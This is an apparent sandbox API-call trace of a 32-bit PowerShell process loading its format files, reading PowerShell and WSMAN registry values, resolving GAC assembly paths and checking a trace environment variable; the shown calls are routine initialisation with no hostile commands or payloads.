	[0226.957] VirtualQuery (in: lpAddress=0x29d178, lpBuffer=0x29e178, dwLength=0x1c | out: lpBuffer=0x29e178*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0226.957] GetLastError () returned 0x0
	[0226.957] SetErrorMode (uMode=0x1) returned 0x1
	[0226.957] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0226.958] GetLastError () returned 0x0
	[0226.958] GetFileType (hFile=0x358) returned 0x1
	[0226.958] SetErrorMode (uMode=0x1) returned 0x1
	[0226.958] GetFileType (hFile=0x358) returned 0x1
	[0226.958] ReadFile (in: hFile=0x358, lpBuffer=0x32f6cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32f6cbc*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.959] GetLastError () returned 0x0
	[0226.959] ReadFile (in: hFile=0x358, lpBuffer=0x32f6cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32f6cbc*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.959] GetLastError () returned 0x0
	[0226.960] ReadFile (in: hFile=0x358, lpBuffer=0x32f6cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32f6cbc*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.960] GetLastError () returned 0x0
	[0226.960] ReadFile (in: hFile=0x358, lpBuffer=0x32f6cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32f6cbc*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.960] GetLastError () returned 0x0
	[0226.961] ReadFile (in: hFile=0x358, lpBuffer=0x32f6cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32f6cbc*, lpNumberOfBytesRead=0x29e424*=0x8b4, lpOverlapped=0x0) returned 1
	[0226.961] GetLastError () returned 0x0
	[0226.961] ReadFile (in: hFile=0x358, lpBuffer=0x32f6110, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32f6110*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.961] GetLastError () returned 0x0
	[0226.962] ReadFile (in: hFile=0x358, lpBuffer=0x32f6cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32f6cbc*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.962] GetLastError () returned 0x0
	[0226.962] CloseHandle (hObject=0x358) returned 1
	[0226.962] GetLastError () returned 0x0
	[0226.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0226.962] GetLastError () returned 0x0
	[0226.962] SetErrorMode (uMode=0x1) returned 0x1
	[0226.962] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3317cb8 | out: lpFileInformation=0x3317cb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0226.962] GetLastError () returned 0x0
	[0226.962] SetErrorMode (uMode=0x1) returned 0x1
	[0226.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0226.962] GetLastError () returned 0x0
	[0226.963] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x358) returned 0x0
	[0226.963] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.963] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.963] RegCloseKey (hKey=0x358) returned 0x0
	[0226.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0226.963] GetLastError () returned 0x0
	[0226.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0226.963] GetLastError () returned 0x0
	[0226.964] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x160bc142, Data2=0xae0a, Data3=0x438f, Data4=([0]=0xab, [1]=0xd, [2]=0x18, [3]=0xda, [4]=0xa0, [5]=0x61, [6]=0xd7, [7]=0xca))) returned 0x0
	[0226.965] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x546e6745, Data2=0xe838, Data3=0x4196, Data4=([0]=0x93, [1]=0xad, [2]=0x82, [3]=0x3d, [4]=0xf3, [5]=0x42, [6]=0x1, [7]=0x80))) returned 0x0
	[0227.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0227.059] GetLastError () returned 0x0
	[0227.059] SetErrorMode (uMode=0x1) returned 0x1
	[0227.060] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0227.060] GetLastError () returned 0x0
	[0227.060] GetFileType (hFile=0x358) returned 0x1
	[0227.060] SetErrorMode (uMode=0x1) returned 0x1
	[0227.060] GetFileType (hFile=0x358) returned 0x1
	[0227.060] ReadFile (in: hFile=0x358, lpBuffer=0x332dbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x332dbc8*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0227.061] GetLastError () returned 0x0
	[0227.062] ReadFile (in: hFile=0x358, lpBuffer=0x332dbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x332dbc8*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0227.062] GetLastError () returned 0x0
	[0227.063] ReadFile (in: hFile=0x358, lpBuffer=0x332dbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x332dbc8*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0227.063] GetLastError () returned 0x0
	[0227.063] ReadFile (in: hFile=0x358, lpBuffer=0x332dbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x332dbc8*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0227.063] GetLastError () returned 0x0
	[0227.065] ReadFile (in: hFile=0x358, lpBuffer=0x332dbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x332dbc8*, lpNumberOfBytesRead=0x29e424*=0xe98, lpOverlapped=0x0) returned 1
	[0227.065] GetLastError () returned 0x0
	[0227.065] ReadFile (in: hFile=0x358, lpBuffer=0x332d200, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x332d200*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0227.065] GetLastError () returned 0x0
	[0227.065] ReadFile (in: hFile=0x358, lpBuffer=0x332dbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x332dbc8*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0227.065] GetLastError () returned 0x0
	[0227.065] CloseHandle (hObject=0x358) returned 1
	[0227.065] GetLastError () returned 0x0
	[0227.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0227.065] GetLastError () returned 0x0
	[0227.066] SetErrorMode (uMode=0x1) returned 0x1
	[0227.066] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x334ebc4 | out: lpFileInformation=0x334ebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0227.066] GetLastError () returned 0x0
	[0227.066] SetErrorMode (uMode=0x1) returned 0x1
	[0227.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0227.066] GetLastError () returned 0x0
	[0227.066] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x358) returned 0x0
	[0227.066] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0227.067] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0227.067] RegCloseKey (hKey=0x358) returned 0x0
	[0227.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0227.067] GetLastError () returned 0x0
	[0227.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0227.067] GetLastError () returned 0x0
	[0227.069] VirtualQuery (in: lpAddress=0x29d100, lpBuffer=0x29e100, dwLength=0x1c | out: lpBuffer=0x29e100*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0227.070] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x6da2d8fc, Data2=0x1af, Data3=0x423b, Data4=([0]=0x88, [1]=0xf8, [2]=0xa3, [3]=0x58, [4]=0xf2, [5]=0x7a, [6]=0x75, [7]=0x2f))) returned 0x0
	[0227.070] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x56c4c351, Data2=0xe226, Data3=0x4c36, Data4=([0]=0x9a, [1]=0x27, [2]=0x71, [3]=0x9e, [4]=0x83, [5]=0x30, [6]=0x40, [7]=0x3d))) returned 0x0
	[0227.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0227.100] GetLastError () returned 0x57
	[0227.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0227.101] GetLastError () returned 0x57
	[0227.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0227.200] GetLastError () returned 0x57
	[0227.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0227.200] GetLastError () returned 0x57
	[0227.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.204] GetLastError () returned 0x57
	[0227.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.205] GetLastError () returned 0x57
	[0227.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0227.207] GetLastError () returned 0x57
	[0227.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0227.207] GetLastError () returned 0x57
	[0227.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0227.209] GetLastError () returned 0x57
	[0227.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0227.210] GetLastError () returned 0x57
	[0227.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0227.212] GetLastError () returned 0x57
	[0227.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0227.213] GetLastError () returned 0x57
	[0227.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0227.215] GetLastError () returned 0x57
	[0227.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0227.215] GetLastError () returned 0x57
	[0227.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.377] GetLastError () returned 0xcb
	[0227.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.379] GetLastError () returned 0xcb
	[0227.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.381] GetLastError () returned 0xcb
	[0227.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.382] GetLastError () returned 0xcb
	[0227.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.393] GetLastError () returned 0xcb
	[0227.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.394] GetLastError () returned 0xcb
	[0227.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.396] GetLastError () returned 0xcb
	[0227.404] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e49c | out: phkResult=0x29e49c*=0x358) returned 0x0
	[0227.406] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29e4ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e4f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29e4ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e4f0*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.409] RegEnumValueW (in: hKey=0x358, dwIndex=0x0, lpValueName=0x7a4288, lpcchValueName=0x29e514, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x29e514, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0227.409] RegEnumValueW (in: hKey=0x358, dwIndex=0x1, lpValueName=0x7a4288, lpcchValueName=0x29e514, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x29e514, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0227.409] RegQueryValueExW (in: hKey=0x358, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29e4f4, lpData=0x0, lpcbData=0x29e4f0*=0x0 | out: lpType=0x29e4f4*=0x1, lpData=0x0, lpcbData=0x29e4f0*=0x8) returned 0x0
	[0227.409] RegQueryValueExW (in: hKey=0x358, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29e4f4, lpData=0x7a4288, lpcbData=0x29e4f0*=0x8 | out: lpType=0x29e4f4*=0x1, lpData="2.0", lpcbData=0x29e4f0*=0x8) returned 0x0
	[0227.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e458 | out: phkResult=0x29e458*=0x32c) returned 0x0
	[0227.862] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29e4a8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e4ac, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29e4a8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29e4ac*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0227.862] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x7a4288, lpcchValueName=0x29e4d0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x29e4d0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0227.862] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x7a4288, lpcchValueName=0x29e4d0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x29e4d0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0227.863] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29e4b0, lpData=0x0, lpcbData=0x29e4ac*=0x0 | out: lpType=0x29e4b0*=0x1, lpData=0x0, lpcbData=0x29e4ac*=0x8) returned 0x0
	[0227.863] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29e4b0, lpData=0x7a4288, lpcbData=0x29e4ac*=0x8 | out: lpType=0x29e4b0*=0x1, lpData="2.0", lpcbData=0x29e4ac*=0x8) returned 0x0
	[0227.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.864] GetLastError () returned 0xcb
	[0227.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.868] GetLastError () returned 0xcb
